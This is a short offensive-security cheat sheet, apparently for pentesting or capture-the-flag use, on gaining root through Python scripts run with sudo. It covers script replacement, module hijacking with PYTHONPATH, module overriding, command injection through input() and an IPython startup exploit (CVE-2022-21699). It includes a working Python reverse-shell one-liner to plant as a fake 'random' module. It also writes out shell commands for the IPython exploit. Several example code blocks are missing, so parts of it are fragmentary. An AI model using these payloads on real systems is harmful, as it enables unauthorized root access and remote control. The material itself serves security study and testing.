Sudo PrivEsc
Replace with Arbitrary Script
If the python script is under the current user's home directory, we can remove the script and create the new one with the same name.
We can insert arbitrary code in the new script. For example,
Module Hijacking
Assume the python script can be executed as root with SETENV,NOPASSWD.
For example,
With SETENV, we can change PYTHONPATH when executing the script, and insert malicious script to the module which is imported in the script.
First off, check what module is imported in the python script (e.g. /opt/example.py here).
We can forge the imported module.
The content of the module is below. This is a script that executes reverse shell.
Replace <local-ip>
with your local ip address.
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
After that, in another local terminal, start listener for getting a shell.
Then run the python script with updating PYTHONPATH in the remote machine.
By setting "PYTHONPATH=/tmp/", the python script will import modules from /tmp/ directories so the "random" module is imported from /tmp/random.py.
Finally, we should get a shell in local terminal.
Module Overriding
If the Python script contains a module that can be modified by current user, we can inject arbitrary code into the module.
First, check what modules the Python script uses.
Assume the “random” module is used in the script.
Find the path of the module and check if it’s writable.
If we know we can modify it, inject arbitrary code in this module.
Assume the “random” module path is /usr/lib/python3.6/random.py
.
Then execute the Python script and we can spawn the root shell.
OS Commands in input()
If you find the executable which is created in Python.
For instance,
You can enter OS commands in some input.
For example,
IPython Privilege Escalation (CVE-2022-21699)
Interective Python (IPython) is a command shell for interective computing in multiple programming languages.
# -m: file mode (rwx)
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/exploit.py